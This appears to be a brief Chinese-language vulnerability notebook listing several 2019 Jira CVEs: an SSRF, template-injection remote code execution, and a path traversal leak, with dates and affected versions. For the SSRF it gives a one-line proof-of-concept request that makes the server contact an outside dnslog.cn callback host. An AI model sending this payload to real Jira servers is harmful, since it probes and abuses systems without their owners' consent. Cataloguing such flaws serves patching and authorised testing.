CVE-2019-8451
Date
2019
类型
ssrf
影响范围
Jira < 8.4.0
复现
poc:
/plugins/servlet/gadgets/makeRequest?url=http://xxx.xxx.198.133:8080@xxx.dnslog.cn
CVE-2019-11581
Date:2019.7
Jira未授权服务端模板注入远程代码执行漏洞
CVE-2019-15001
Date:2019.10
Jira Importers Plugin模板注入漏洞
CVE-2019-14994
Date:
2019.10
类型:
Jira服务工作台路径遍历导致的敏感信息泄露漏洞
影响版本: All versions before 3.9.16 3.10.x 3.11.x 3.12.x 3.13.x 3.14.x 3.15.x 3.16.x before 3.16.8 (the fixed version for 3.16.x) 4.0.x 4.1.x before 4.1.3 (the fixed version for 4.1.x) 4.2.x before 4.2.5 (the fixed version for 4.2.x) 4.3.x before 4.3.4 (the fixed version for 4.3.x) 4.4.0 before 4.4.1 (the fixed version for 4.4.x)